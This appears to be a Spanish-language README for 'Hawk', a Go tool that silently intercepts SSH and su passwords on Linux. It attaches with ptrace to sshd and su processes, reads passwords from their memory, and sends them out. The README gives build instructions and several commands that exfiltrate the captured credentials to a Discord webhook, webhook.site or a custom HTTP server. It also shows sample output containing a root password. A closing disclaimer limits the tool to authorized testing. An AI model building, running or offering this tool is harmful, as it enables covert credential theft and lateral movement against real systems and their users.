
Herramienta en Golang diseñada para exfiltrar contraseñas encontradas a través de los servicios sshd y su
Intercepta silenciosamente credenciales SSH y SU en tiempo real
Hawk monitorea los procesos sshd y su, extrayendo contraseñas de la memoria mediante ptrace sin modificar los procesos objetivo. Cero escrituras. Recolección de credenciales puramente de solo lectura.

Hawk aprovecha el sistema de archivos /proc de Linux para descubrir procesos SSH y SU, luego usa ptrace para adjuntarse e interceptar llamadas al sistema. Cuando ocurre la autenticación por contraseña, lee la contraseña directamente de la memoria del proceso durante la llamada al sistema write() — completamente transparente para el proceso objetivo. Las credenciales se exfiltran mediante un webhook o se imprimen en stdout.
Análisis detallado: Blog Post
GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build -o hawk
Hawk detecta automáticamente los webhooks de Discord y envía mensajes formateados:
./hawk https://discord.com/api/webhooks/YOUR_WEBHOOK_ID/YOUR_WEBHOOK_TOKEN
Configuración: Crea un webhook en tu servidor de Discord siguiendo la guía de webhooks de Discord. Las credenciales aparecerán en tu canal formateadas con nombre de host, usuario y contraseña.
Para otros servicios de webhook (webhook.site, servidores personalizados, etc.):
# HTTPS (detección automática)
./hawk https://webhook.site/your-unique-id
# HTTP
./hawk http://192.168.1.100:6969/webhook
# HTTPS automático si no se especifica protocolo
./hawk webhook.example.com/path
¿Sin webhook? Las credenciales se imprimen en stdout:
./hawk
Salida:
hostname=server01 username=root password=SuperSecret123
/proc montadoEsta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Úsala de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito para realizar pruebas.